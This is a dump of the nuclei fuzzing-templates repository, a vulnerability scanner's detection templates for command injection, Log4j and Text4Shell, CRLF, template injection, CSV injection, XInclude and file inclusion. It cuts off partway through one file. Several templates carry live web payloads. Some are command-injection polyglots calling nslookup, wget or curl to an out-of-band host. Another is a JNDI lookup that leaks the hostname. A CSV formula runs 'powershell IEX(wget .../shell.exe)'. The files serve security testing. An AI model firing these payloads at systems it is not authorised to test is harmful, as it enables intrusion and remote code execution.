├── .github ├── ISSUE_TEMPLATE │ ├── config.yml │ ├── false-negative.md │ ├── false-positive.md │ ├── feature_request.md │ ├── issue-report.md │ ├── new-template.md │ └── submit-template.md └── workflows │ ├── cve-annotate.yml │ ├── syntax-checking.yml │ └── template-validate.yml ├── .gitignore ├── .yamllint ├── LICENSE ├── README.md ├── cmdi ├── blind-oast-polyglots.yaml ├── cves │ ├── CVE-2018-19518.yaml │ ├── CVE-2021-45046.yaml │ └── CVE-2022-42889.yaml └── ruby-open-rce.yaml ├── crlf ├── cookie-injection.yaml └── crlf-injection.yaml ├── csti └── angular-client-side-template-injection.yaml ├── injection ├── csv-injection.yaml └── xinclude-injection.yaml ├── lfi ├── lfi-keyed.yaml ├── linux-lfi-fuzz.yaml └── windows-lfi-fuzz.yaml ├── redirect └── open-redirect.yaml ├── rfi └── generic-rfi.yaml ├── sqli ├── cves │ └── CVE-2022-34265.yaml ├── error-based-sqli.yaml └── time-based-sqli.yaml ├── ssrf ├── blind-ssrf.yaml └── response-ssrf.yaml ├── ssti └── reflection-ssti.yaml ├── xss ├── blind-xss.yaml ├── dom-xss.yaml └── reflected-xss.yaml └── xxe └── generic-xxe.yaml /.github/ISSUE_TEMPLATE/config.yml: -------------------------------------------------------------------------------- 1 | blank_issues_enabled: false 2 | 3 | contact_links: 4 | - name: Ask an question / advise on using nuclei-templates 5 | url: https://github.com/projectdiscovery/fuzzing-templates/discussions/categories/q-a 6 | about: Ask a question or request support for using fuzzing-templates 7 | 8 | - name: Share idea / feature to discuss for nuclei-templates 9 | url: https://github.com/projectdiscovery/fuzzing-templates/discussions/categories/ideas 10 | about: Share idea / feature to discuss for fuzzing-templates 11 | 12 | - name: Connect with PD Team & Community (Discord) 13 | url: https://discord.gg/projectdiscovery 14 | about: Connect with PD Team & Community for direct communication -------------------------------------------------------------------------------- 
/.github/ISSUE_TEMPLATE/false-negative.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: False Negative 3 | about: 'Issue for template missing valid/expected result.' 4 | labels: 'false-negative' 5 | 6 | --- 7 | 8 | 9 | 10 | ### Nuclei Version: 11 | 12 | 13 | 14 | ### Template file: 15 | 16 | 17 | 18 | ### Command to reproduce: 19 | 20 | 21 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/false-positive.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: False Positive 3 | about: 'Issue for template producing invalid/unexpected result.' 4 | labels: 'false-positive' 5 | 6 | --- 7 | 8 | 9 | 10 | ### Nuclei Version: 11 | 12 | 13 | 14 | ### Template file: 15 | 16 | 17 | 18 | ### Command to reproduce: 19 | 20 | 21 | 22 | 23 | ### Anything else: 24 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/feature_request.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Feature request 3 | about: Request feature to implement in this project 4 | labels: 'Type: Enhancement' 5 | --- 6 | 7 | 13 | 14 | ### Please describe your feature request: 15 | 16 | 17 | ### Describe the use case of this feature: 18 | 19 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/issue-report.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Issue report 3 | about: "Issue to report invalid template" 4 | labels: 'Type: Bug' 5 | 6 | --- 7 | 8 | 13 | 14 | 15 | 16 | ### Issue description: 17 | 18 | 19 | 20 | ### Anything else: 21 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/new-template.md: -------------------------------------------------------------------------------- 1 | 
--- 2 | name: Template Request 3 | about: 'request for new template to be created.' 4 | labels: 'new-template' 5 | 6 | --- 7 | 8 | 9 | 10 | 11 | ### Template for? 12 | 13 | 14 | 15 | ### Details: 16 | 17 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/submit-template.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Template Contribution 3 | about: Contributing nuclei template using GitHub Issue 4 | labels: 'nuclei-template' 5 | --- 6 | 7 | ### Template Information: 8 | 9 | 10 | 11 | 12 | 13 | ### Nuclei Template: 14 | 15 | 16 | 17 | 18 | ```yaml 19 | 20 | ``` 21 | 22 | 23 | -------------------------------------------------------------------------------- /.github/workflows/cve-annotate.yml: -------------------------------------------------------------------------------- 1 | name: ✍🏻 CVE Annotate 2 | 3 | on: 4 | pull_request: 5 | paths: 6 | - '**/cves/' 7 | workflow_dispatch: 8 | 9 | jobs: 10 | annotate: 11 | runs-on: ubuntu-latest 12 | steps: 13 | - name: Check out code 14 | uses: actions/checkout@v3 15 | with: 16 | ref: ${{ github.head_ref }} 17 | fetch-depth: 0 18 | token: ${{ secrets.GITHUB_TOKEN }} 19 | 20 | - name: Get Github tag 21 | id: meta 22 | run: | 23 | curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name | xargs -I {} echo TAG={} >> $GITHUB_OUTPUT 24 | 25 | - name: Setup CVE annotate 26 | if: steps.meta.outputs.TAG != '' 27 | env: 28 | VERSION: ${{ steps.meta.outputs.TAG }} 29 | run: | 30 | wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/cve-annotate.zip 31 | sudo unzip cve-annotate.zip -d /usr/local/bin 32 | working-directory: /tmp 33 | 34 | - name: Generate CVE Annotations 35 | id: cve-annotate 36 | run: | 37 | cve-annotate -i . -d . 
38 | git status -s | wc -l | xargs -I {} echo CHANGES={} >> $GITHUB_OUTPUT 39 | 40 | - name: Commit files 41 | if: steps.cve-annotate.outputs.CHANGES > 0 42 | run: | 43 | git config --local user.email "action@github.com" 44 | git config --local user.name "GitHub Action" 45 | git add . 46 | git commit -m "Auto Generated CVE annotations [$(date)] :robot:" -a 47 | 48 | - name: Push changes 49 | if: steps.cve-annotate.outputs.CHANGES > 0 50 | uses: ad-m/github-push-action@master 51 | with: 52 | github_token: ${{ secrets.GITHUB_TOKEN }} 53 | branch: ${{ github.ref }} -------------------------------------------------------------------------------- /.github/workflows/syntax-checking.yml: -------------------------------------------------------------------------------- 1 | name: ❄️ YAML Lint 2 | 3 | on: 4 | pull_request: 5 | workflow_dispatch: 6 | 7 | jobs: 8 | build: 9 | runs-on: ubuntu-latest 10 | steps: 11 | - uses: actions/checkout@v2 12 | - name: Yamllint 13 | uses: karancode/yamllint-github-action@master 14 | with: 15 | yamllint_config_filepath: .yamllint 16 | yamllint_strict: false 17 | yamllint_comment: true 18 | -------------------------------------------------------------------------------- /.github/workflows/template-validate.yml: -------------------------------------------------------------------------------- 1 | name: 🛠 Template Validate 2 | 3 | on: 4 | pull_request: 5 | workflow_dispatch: 6 | 7 | jobs: 8 | validate: 9 | runs-on: ubuntu-latest 10 | steps: 11 | - uses: actions/checkout@v2 12 | 13 | - name: Get Github tag 14 | id: meta 15 | run: | 16 | curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name | xargs -I {} echo TAG={} >> $GITHUB_OUTPUT 17 | 18 | - name: Setup Nuclei 19 | if: steps.meta.outputs.TAG != '' 20 | env: 21 | VERSION: ${{ steps.meta.outputs.TAG }} 22 | run: | 23 | wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/nuclei_${VERSION:1}_linux_amd64.zip 24 | sudo unzip 
nuclei*.zip -d /usr/local/bin 25 | working-directory: /tmp 26 | 27 | - name: Template Validation 28 | run: | 29 | cp -r ${{ github.workspace }} $HOME 30 | nuclei -validate -lfa 31 | nuclei -validate -lfa -w ./workflows -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | notes.txt 2 | .DS_Store 3 | -------------------------------------------------------------------------------- /.yamllint: -------------------------------------------------------------------------------- 1 | extends: default 2 | 3 | ignore: | 4 | .pre-commit-config.yml 5 | .github/workflows/*.yml 6 | 7 | rules: 8 | document-start: disable 9 | line-length: disable 10 | new-lines: disable 11 | new-line-at-end-of-file: disable 12 | truthy: disable 13 | comments: 14 | require-starting-space: true 15 | ignore-shebangs: true 16 | min-spaces-from-content: 1 17 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 ProjectDiscovery 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 
14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 | 3 |

4 | Fuzzing Templates 5 |

6 |

A community-curated list of fuzzing templates for the nuclei engine, used to find previously unknown security vulnerabilities.

7 | 8 | 9 |

10 | 11 | 12 | 13 |

14 | 15 |

16 | Documentation • 17 | Contributions • 18 | Discussion • 19 | Community 20 |

21 | 22 | ---- 23 | 24 | Fuzzing templates are used with the [nuclei](https://github.com/projectdiscovery/nuclei) scanner, which powers the actual scanning engine. This repository contains various fuzzing templates for the scanner provided by our team, as well as contributed by the community. 25 | 26 | We welcome contributions from the community through pull requests or issues to increase the coverage of security testing. Unlike the [nuclei-templates](https://github.com/projectdiscovery/nuclei-templates) project, which focuses on known vulnerabilities, fuzzing templates are specifically designed to **discover previously unknown vulnerabilities** in applications. 27 | 28 | 29 | ![image](https://user-images.githubusercontent.com/8293321/205839007-b18a1dc2-5b4e-4ee4-9051-c13b30089ee3.png) 30 | 31 | 32 | 33 | 📖 Documentation 34 | ----- 35 | 36 | Please navigate to https://docs.nuclei.sh/template-guide/http/http-fuzzing for detailed documentation on how to **build your own fuzzing** template. 37 | We have also added a set of templates to help you understand how things work. 38 | 39 | 40 | 🌪️ Using Fuzzing Templates 41 | ----- 42 | 43 | 1. **Install Nuclei** 44 | 45 | ``` 46 | go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest 47 | ``` 48 | 49 | 2. **Clone Fuzzing Templates** 50 | 51 | ``` 52 | git clone https://github.com/projectdiscovery/fuzzing-templates.git 53 | ``` 54 | 55 | 3. **Run Fuzzing Templates** 56 | 57 | #### Input for fuzzing templates: 58 | 59 | Current fuzzing support is limited to URLs with query parameters, so any URLs without query parameters will simply be ignored. 
60 | 61 | ```bash 62 | $ cat fuzz_endpoints.txt 63 | 64 | http://127.0.0.1:8082/info?name=test&another=value&random=data 65 | http://127.0.0.1:8082/redirect?redirect_url=/info?name=redirected_from_url 66 | http://127.0.0.1:8082/request?url=https://example.com 67 | http://127.0.0.1:8082/email?text=important_user 68 | http://127.0.0.1:8082/permissions?cmd=whoami 69 | http://127.0.0.1:8082/info?name=redirected_from_url 70 | ``` 71 | 72 | > **Note**: 73 | 74 | > *You can use [katana](https://github.com/projectdiscovery/katana) with query url filter (`-f qurl`) to get list of endpoints to run with url fuzzing templates* 75 | 76 | #### Running fuzzing templates: 77 | 78 | ``` 79 | nuclei -t fuzzing-templates -list fuzz_endpoints.txt 80 | ``` 81 | 82 | > **Note**: 83 | 84 | > *You can use existing nuclei options to filter / run specific directory / sub directory / templates or tags* 85 | 86 | 💬 Discussion 87 | ----- 88 | 89 | Got questions / doubts / ideas to discuss? 90 | Feel free to open a discussion on [GitHub discussions](https://github.com/projectdiscovery/fuzzing-templates/discussions) board. 91 | 92 | 93 | 👨‍💻 Community 94 | ----- 95 | 96 | You are welcome to join the active [Discord Community](https://discord.gg/projectdiscovery) to discuss directly with project maintainers and share things with others around security and automation. 97 | Additionally, you may follow us on [Twitter](https://twitter.com/pdnuclei) to be updated on all the things about Nuclei. 98 | 99 | 100 |

101 | 102 | 103 | 104 |

105 | 106 | 107 | Thanks again for your contribution and keeping this community vibrant. ❤️ 108 | -------------------------------------------------------------------------------- /cmdi/blind-oast-polyglots.yaml: -------------------------------------------------------------------------------- 1 | id: cmdi-blind-oast-polyglot 2 | 3 | info: 4 | name: Blind OS Command Injection 5 | author: pdteam,geeknik 6 | severity: high 7 | description: | 8 | Potential blind OS command injection vulnerabilities, where the application constructs OS commands using unsanitized user input. 9 | Successful exploitation could lead to arbitrary command execution on the system. 10 | reference: 11 | - https://portswigger.net/research/hunting-asynchronous-vulnerabilities 12 | - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Command%20Injection/README.md 13 | metadata: 14 | max-request: 4 15 | tags: cmdi,oast,dast,blind,polyglot 16 | 17 | variables: 18 | marker: "{{interactsh-url}}" 19 | 20 | http: 21 | - pre-condition: 22 | - type: dsl 23 | dsl: 24 | - 'method == "GET"' 25 | 26 | payloads: 27 | payload: 28 | - "&nslookup {{marker}}&'\\\"`0&nslookup {{marker}}&`'" 29 | - "1;nslookup${IFS}{{marker}};#${IFS}';nslookup${IFS}{{marker}};#${IFS}\";nslookup${IFS}{{marker}};#${IFS}" 30 | - "/*$(nslookup {{marker}})`nslookup {{marker}}``*/-nslookup({{marker}})-'/*$(nslookup {{marker}})`nslookup {{marker}}` #*/-nslookup({{marker}})||'\"||nslookup({{marker}})||\"/*`*/" 31 | - "$(ping -c 1 {{marker}} | nslookup {{marker}} ; wget {{marker}} -O /dev/null)" 32 | 33 | fuzzing: 34 | - part: query 35 | type: postfix 36 | fuzz: 37 | - "{{payload}}" 38 | 39 | stop-at-first-match: true 40 | matchers: 41 | - type: word 42 | part: interactsh_protocol 43 | words: 44 | - "dns" 45 | 46 | - type: word 47 | part: interactsh_protocol 48 | words: 49 | - "http" 50 | -------------------------------------------------------------------------------- /cmdi/cves/CVE-2018-19518.yaml: 
-------------------------------------------------------------------------------- 1 | id: CVE-2018-19518 2 | 3 | info: 4 | name: PHP imap - Remote Command Execution 5 | author: princechaddha 6 | severity: high 7 | description: | 8 | University of Washington IMAP Toolkit 2007f on UNIX, as used in imap_open() in PHP and other products, launches an rsh command (by means of the imap_rimap function in c-client/imap4r1.c and the tcp_aopen function in osdep/unix/tcp_unix.c) without preventing argument injection, which might allow remote attackers to execute arbitrary OS commands if the IMAP server name is untrusted input (e.g., entered by a user of a web application) and if rsh has been replaced by a program with different argument semantics. For example, if rsh is a link to ssh (as seen on Debian and Ubuntu systems), then the attack can use an IMAP server name containing a "-oProxyCommand" argument. 9 | reference: 10 | - https://github.com/vulhub/vulhub/tree/master/php/CVE-2018-19518 11 | - https://nvd.nist.gov/vuln/detail/CVE-2018-19518 12 | - https://www.openwall.com/lists/oss-security/2018/11/22/3 13 | - https://github.com/Bo0oM/PHP_imap_open_exploit/blob/master/exploit.php 14 | classification: 15 | cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H 16 | cvss-score: 7.5 17 | cve-id: CVE-2018-19518 18 | cwe-id: CWE-88 19 | metadata: 20 | confidence: tenative 21 | tags: imap,dast,vulhub,cve,cve2018,rce,oast,php 22 | 23 | http: 24 | - method: GET 25 | path: 26 | - "{{BaseURL}}" 27 | 28 | payloads: 29 | php-imap: 30 | - "x -oProxyCommand=echo {{base64(url_encode('nslookup {{interactsh-url}}'))}}|base64 -d|sh}" 31 | 32 | fuzzing: 33 | - part: query 34 | fuzz: 35 | - "{{php-imap}}" 36 | 37 | matchers: 38 | - type: word 39 | part: interactsh_protocol # Confirms the DNS Interaction 40 | words: 41 | - "dns" 42 | -------------------------------------------------------------------------------- /cmdi/cves/CVE-2021-45046.yaml: 
-------------------------------------------------------------------------------- 1 | id: CVE-2021-45046 2 | 3 | info: 4 | name: Apache Log4j2 - Remote Code Injection 5 | author: princechaddha 6 | severity: critical 7 | description: Apache Log4j2 Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default configurations. 8 | reference: 9 | - https://securitylab.github.com/advisories/GHSL-2021-1054_GHSL-2021-1055_log4j2/ 10 | - https://twitter.com/marcioalm/status/1471740771581652995 11 | - https://logging.apache.org/log4j/2.x/ 12 | - http://www.openwall.com/lists/oss-security/2021/12/14/4 13 | - https://nvd.nist.gov/vuln/detail/CVE-2021-44228 14 | classification: 15 | cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H 16 | cvss-score: 9 17 | cve-id: CVE-2021-45046 18 | cwe-id: CWE-502 19 | metadata: 20 | confidence: tenative 21 | tags: cve,cve2021,rce,oast,log4j,injection,dast 22 | 23 | http: 24 | - method: GET 25 | path: 26 | - "{{BaseURL}}" 27 | 28 | payloads: 29 | log4j: 30 | - "${jndi:ldap://127.0.0.1#.${hostName}.{{interactsh-url}}}" 31 | 32 | fuzzing: 33 | - part: query 34 | fuzz: 35 | - "{{log4j}}" 36 | 37 | matchers-condition: and 38 | matchers: 39 | - type: word 40 | part: interactsh_protocol # Confirms the DNS Interaction 41 | words: 42 | - "dns" 43 | 44 | - type: regex 45 | part: interactsh_request 46 | regex: 47 | - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output 48 | 49 | extractors: 50 | - type: regex 51 | part: interactsh_request 52 | group: 2 53 | regex: 54 | - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output 55 | 56 | - type: regex 57 | part: interactsh_request 58 | group: 1 59 | regex: 60 | - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output 61 | -------------------------------------------------------------------------------- 
/cmdi/cves/CVE-2022-42889.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2022-42889 2 | 3 | info: 4 | name: Text4Shell - Remote Code Execution 5 | author: mordavid,princechaddha 6 | severity: critical 7 | description: | 8 | Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - "script" - execute expressions using the JVM script execution engine (javax.script) - "dns" - resolve dns records - "url" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Text 1.10.0, which disables the problematic interpolators by default. 9 | reference: 10 | - https://lists.apache.org/thread/n2bd4vdsgkqh2tm14l1wyc3jyol7s1om 11 | - http://www.openwall.com/lists/oss-security/2022/10/13/4 12 | - http://www.openwall.com/lists/oss-security/2022/10/18/1 13 | - https://securitylab.github.com/advisories/GHSL-2022-018_Apache_Commons_Text/ 14 | - https://github.com/silentsignal/burp-text4shell 15 | remediation: Upgrade Apache Commons Text to 1.10.0 or later; versions from 1.5.0 up to (but not including) 1.10.0 are affected. 
16 | classification: 17 | cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 18 | cvss-score: 9.8 19 | cve-id: CVE-2022-42889 20 | cwe-id: CWE-94 21 | metadata: 22 | confidence: tenative 23 | tags: cve,cve2022,rce,oast,text4shell,dast 24 | 25 | http: 26 | - method: GET 27 | path: 28 | - "{{BaseURL}}" 29 | 30 | payloads: 31 | text4shell: 32 | - "${url:UTF-8:https://{{Hostname}}.q.{{interactsh-url}}}" 33 | 34 | fuzzing: 35 | - part: query 36 | fuzz: 37 | - "{{text4shell}}" 38 | 39 | matchers-condition: and 40 | matchers: 41 | - type: word 42 | part: interactsh_protocol # Confirms the DNS Interaction 43 | words: 44 | - "dns" 45 | 46 | - type: regex 47 | part: interactsh_request 48 | regex: 49 | - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output 50 | 51 | extractors: 52 | - type: kval 53 | kval: 54 | - interactsh_ip # Print remote interaction IP in output 55 | 56 | - type: regex 57 | part: interactsh_request 58 | group: 2 59 | regex: 60 | - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output 61 | 62 | - type: regex 63 | part: interactsh_request 64 | group: 1 65 | regex: 66 | -------------------------------------------------------------------------------- /cmdi/ruby-open-rce.yaml: -------------------------------------------------------------------------------- 1 | id: cmdi-ruby-open-rce 2 | 3 | info: 4 | name: Ruby Kernel#open/URI.open RCE 5 | author: pdteam 6 | severity: high 7 | description: | 8 | Ruby's Kernel#open and URI.open enables not only file access but also process invocation by prefixing a pipe symbol (e.g., open(“| ls”)). So, it may lead to Remote Code Execution by using variable input to the argument of Kernel#open and URI.open. 
9 | reference: 10 | - https://bishopfox.com/blog/ruby-vulnerabilities-exploits 11 | - https://codeql.github.com/codeql-query-help/ruby/rb-kernel-open/ 12 | metadata: 13 | max-request: 1 14 | tags: cmdi,oast,dast,blind,ruby,rce 15 | 16 | variables: 17 | marker: "{{interactsh-url}}" 18 | 19 | http: 20 | - pre-condition: 21 | - type: dsl 22 | dsl: 23 | - 'method == "GET"' 24 | 25 | stop-at-first-match: true 26 | payloads: 27 | interaction: 28 | - "|nslookup {{marker}}|curl {{marker}}" 29 | 30 | fuzzing: 31 | - part: query 32 | fuzz: 33 | - "{{interaction}}" 34 | 35 | matchers: 36 | - type: word 37 | part: interactsh_protocol 38 | words: 39 | - "dns" 40 | -------------------------------------------------------------------------------- /crlf/cookie-injection.yaml: -------------------------------------------------------------------------------- 1 | id: cookie-injection 2 | 3 | info: 4 | name: Parameter based cookie injection 5 | author: pdteam 6 | severity: info 7 | reference: 8 | - https://www.invicti.com/blog/web-security/understanding-cookie-poisoning-attacks/ 9 | - https://docs.imperva.com/bundle/on-premises-knowledgebase-reference-guide/page/cookie_injection.htm 10 | metadata: 11 | max-request: 1 12 | tags: reflected,dast,cookie,injection 13 | 14 | variables: 15 | first: "cookie_injection" 16 | 17 | http: 18 | - pre-condition: 19 | - type: dsl 20 | dsl: 21 | - 'method == "GET"' 22 | 23 | payloads: 24 | reflection: 25 | - "{{first}}" 26 | 27 | fuzzing: 28 | - part: query 29 | type: postfix 30 | fuzz: 31 | - "{{reflection}}" 32 | 33 | matchers: 34 | - type: regex 35 | part: header 36 | regex: 37 | - '(?m)(?i)(^set-cookie.*cookie_injection.*)' 38 | -------------------------------------------------------------------------------- /crlf/crlf-injection.yaml: -------------------------------------------------------------------------------- 1 | id: crlf-injection 2 | 3 | info: 4 | name: CRLF Injection 5 | author: pdteam 6 | severity: low 7 | metadata: 8 | max-request: 41 9 | 
tags: crlf,dast 10 | 11 | http: 12 | - pre-condition: 13 | - type: dsl 14 | dsl: 15 | - 'method == "GET"' 16 | 17 | payloads: 18 | escape: 19 | - "%00" 20 | - "%0a" 21 | - "%0a%20" 22 | - "%0d" 23 | - "%0d%09" 24 | - "%0d%0a" 25 | - "%0d%0a%09" 26 | - "%0d%0a%20" 27 | - "%0d%20" 28 | - "%20" 29 | - "%20%0a" 30 | - "%20%0d" 31 | - "%20%0d%0a" 32 | - "%23%0a" 33 | - "%23%0a%20" 34 | - "%23%0d" 35 | - "%23%0d%0a" 36 | - "%23%oa" 37 | - "%25%30" 38 | - "%25%30%61" 39 | - "%2e%2e%2f%0d%0a" 40 | - "%2f%2e%2e%0d%0a" 41 | - "%2f..%0d%0a" 42 | - "%3f" 43 | - "%3f%0a" 44 | - "%3f%0d" 45 | - "%3f%0d%0a" 46 | - "%e5%98%8a%e5%98%8d" 47 | - "%e5%98%8a%e5%98%8d%0a" 48 | - "%e5%98%8a%e5%98%8d%0d" 49 | - "%e5%98%8a%e5%98%8d%0d%0a" 50 | - "%e5%98%8a%e5%98%8d%e5%98%8a%e5%98%8d" 51 | - "%u0000" 52 | - "%u000a" 53 | - "%u000d" 54 | - "\r" 55 | - "\r%20" 56 | - "\r\n" 57 | - "\r\n%20" 58 | - "\r\n\t" 59 | - "\r\t" 60 | 61 | fuzzing: 62 | - part: query 63 | type: postfix 64 | fuzz: 65 | - "{{escape}}Set-Cookie:crlfinjection=crlfinjection" 66 | 67 | stop-at-first-match: true 68 | matchers: 69 | - type: regex 70 | part: header 71 | regex: 72 | - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)' 73 | -------------------------------------------------------------------------------- /csti/angular-client-side-template-injection.yaml: -------------------------------------------------------------------------------- 1 | id: angular-client-side-template-injection 2 | 3 | info: 4 | name: Angular Client-side-template-injection 5 | author: theamanrawat 6 | severity: high 7 | description: | 8 | Detects Angular client-side template injection vulnerability. 9 | impact: | 10 | May lead to remote code execution or sensitive data exposure. 11 | remediation: | 12 | Sanitize user inputs and avoid using user-controlled data in template rendering. 
13 | reference: 14 | - https://www.acunetix.com/vulnerabilities/web/angularjs-client-side-template-injection/ 15 | - https://portswigger.net/research/xss-without-html-client-side-template-injection-with-angularjs 16 | tags: angular,csti,dast,headless,xss 17 | 18 | variables: 19 | first: "{{rand_int(1000, 9999)}}" 20 | second: "{{rand_int(1000, 9999)}}" 21 | result: "{{to_number(first)*to_number(second)}}" 22 | 23 | headless: 24 | - steps: 25 | - action: navigate 26 | args: 27 | url: "{{BaseURL}}" 28 | 29 | - action: waitload 30 | 31 | payloads: 32 | payload: 33 | - '{{concat("{{", "{{first}}*{{second}}", "}}")}}' 34 | 35 | fuzzing: 36 | - part: query 37 | type: postfix 38 | mode: single 39 | fuzz: 40 | - "{{payload}}" 41 | 42 | matchers: 43 | - type: word 44 | part: body 45 | words: 46 | - "{{result}}" 47 | -------------------------------------------------------------------------------- /injection/csv-injection.yaml: -------------------------------------------------------------------------------- 1 | id: csv-injection 2 | 3 | info: 4 | name: CSV Injection Detection 5 | author: DhiyaneshDK,ritikchaddha 6 | severity: medium 7 | description: | 8 | A CSV injection detection template to identify and prevent CSV injection vulnerabilities by using various payloads that could be interpreted as formulas by spreadsheet applications. 
9 | tags: dast,csv,oast 10 | 11 | http: 12 | - pre-condition: 13 | - type: dsl 14 | dsl: 15 | - 'method == "GET"' 16 | 17 | payloads: 18 | csv_fuzz: 19 | - "class.module.classLoader.resources.context.configFile=http://{{interactsh-url}}" 20 | - 'DDE ("cmd";"/C nslookup{{interactsh-url}}";"!A0")A0' 21 | - "@SUM(1+9)*cmd|' /C nslookup{{interactsh-url}}'!A0" 22 | - "=10+20+cmd|' /C nslookup{{interactsh-url}}'!A0" 23 | - "=cmd|' /C nslookup{{interactsh-url}}'!'A1'" 24 | - "=cmd|'/C powershell IEX(wget{{interactsh-url}}/shell.exe)'!A0" 25 | - '=IMPORTXML(CONCAT("http://{{interactsh-url}}", CONCATENATE(A2:E2)), "//a/a10")' 26 | - '=IMPORTFEED(CONCAT("http://{{interactsh-url}}/123.txt?v=", CONCATENATE(A2:E2)))' 27 | - '=IMPORTHTML (CONCAT("http://{{interactsh-url}}/123.txt?v=", CONCATENATE(A2:E2)),"table",1)' 28 | - '=IMAGE("https://{{interactsh-url}}/images/srpr/logo3w.png")' 29 | 30 | fuzzing: 31 | - part: query 32 | type: replace # replaces existing parameter value with fuzz payload 33 | mode: multiple # replaces all parameters value with fuzz payload 34 | fuzz: 35 | - '{{csv_fuzz}}' 36 | 37 | matchers-condition: and 38 | matchers: 39 | - type: word 40 | part: interactsh_protocol # Confirms the HTTP Interaction 41 | words: 42 | - "http" 43 | 44 | - type: word 45 | part: header 46 | words: 47 | - "text/csv" 48 | - "application/csv" 49 | - "application/vnd.ms-excel" 50 | -------------------------------------------------------------------------------- /injection/xinclude-injection.yaml: -------------------------------------------------------------------------------- 1 | id: xinclude-injection 2 | 3 | info: 4 | name: XInclude Injection - Detection 5 | author: DhiyaneshDK,ritikchaddha 6 | severity: high 7 | description: | 8 | XInclude is a part of the XML specification that allows an XML document to be built from sub-documents. 
You can place an XInclude attack within any data value in an XML document, so the attack can be performed in situations where you only control a single item of data that is placed into a server-side XML document. 9 | reference: 10 | - https://d0pt3x.gitbook.io/passion/webapp-security/xxe-attacks/xinclude-attacks 11 | tags: dast,xxe,xinclude 12 | 13 | http: 14 | - pre-condition: 15 | - type: dsl 16 | dsl: 17 | - 'method == "GET"' 18 | 19 | payloads: 20 | xinc_fuzz: 21 | - '' 22 | - '' 23 | 24 | fuzzing: 25 | - part: query 26 | type: replace # replaces existing parameter value with fuzz payload 27 | mode: multiple # replaces all parameters value with fuzz payload 28 | fuzz: 29 | - '{{xinc_fuzz}}' 30 | 31 | stop-at-first-match: true 32 | matchers-condition: or 33 | matchers: 34 | - type: regex 35 | name: linux 36 | part: body 37 | regex: 38 | - 'root:.*?:[0-9]*:[0-9]*:' 39 | 40 | - type: word 41 | name: windows 42 | part: body 43 | words: 44 | - 'for 16-bit app support' 45 | -------------------------------------------------------------------------------- /lfi/lfi-keyed.yaml: -------------------------------------------------------------------------------- 1 | id: lfi-keyed 2 | 3 | info: 4 | name: LFI Detection - Keyed 5 | author: pwnhxl 6 | severity: unknown 7 | reference: 8 | - https://owasp.org/www-community/attacks/Unicode_Encoding 9 | metadata: 10 | max-request: 25 11 | tags: dast,pathtraversal,lfi 12 | 13 | variables: 14 